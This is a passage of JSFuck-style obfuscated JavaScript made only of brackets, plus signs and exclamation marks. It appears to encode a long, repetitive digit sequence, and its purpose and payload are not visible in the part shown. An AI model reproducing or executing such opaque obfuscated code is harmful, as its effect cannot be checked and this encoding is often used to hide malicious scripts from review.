+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]